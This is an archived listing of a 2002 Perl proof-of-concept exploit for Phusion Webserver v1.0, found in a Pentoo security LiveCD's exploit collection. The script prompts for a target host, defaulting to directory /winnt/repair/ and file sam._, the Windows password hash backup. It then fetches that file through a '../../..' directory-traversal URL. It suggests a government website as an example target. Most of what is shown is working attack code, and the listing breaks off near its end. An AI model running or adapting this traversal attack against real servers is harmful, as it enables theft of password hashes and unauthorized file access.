home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / phusion / Phusion-GET.pl < prev    next >
Perl Script  |  2005-02-12  |  1KB  |  55 lines

  1. #!/usr/bin/perl
  2. #
  3. # THIS SCRIPT ONLY FOR WINDOWS WITH PERL OR CYGWIN 
  4. # Simple script to get files on server. 
  5. # Maybe u need this line for windows:
  6. # #! c:\perl\bin\perl.exe
  7. #
  8. # Phusion Webserver v1.0 proof-of-concept exploit.
  9. # By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
  10. #
  11. # Thanks all the people from Spain and Argentina.
  12. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, 
  13. # G.Maggiotti & H.Oliveira.
  14. #
  15. # Usage: perl -x Phusion-GET.pl <And read the Intructions>
  16. #  
  17. #
  18.  
  19.  
  20. print("\nPhusion Webserver v1.0 GET Files exploit (c)2002.\n");
  21. print("Alex Hernandez al3xhernandez\@ureach.com\n\n");
  22.  
  23.  
  24. print <<"EOT";
  25. Please type the address remote webserver, example: www.whitehouse.gov
  26. [Default remote Webserver is "127.0.0.1"`]:
  27. EOT
  28. $host = <>;
  29.  
  30. print <<"EOT";
  31. Please type only in the directory where the file is located you want to
  32. download, 
  33. example: /winnt/repair/
  34. [default directory is "/winnt/repair/"] :#For IIS 4-5
  35. EOT
  36. $directory = <> || "/winnt/repair/";
  37.  
  38.  
  39. print <<"EOT";
  40. Please type in the filename you want download example: sam._ 
  41. [default file is "sam._"] :
  42. EOT
  43. $file = <> || "sam._";
  44.  
  45. {
  46. #Maybe u to change this line depending of PATH installation.
  47. system("explorer.exe", "http://$host:80/../../..$directory$file");
  48. }
  49.  
  50. print <<"EOT";
  51.  
  52.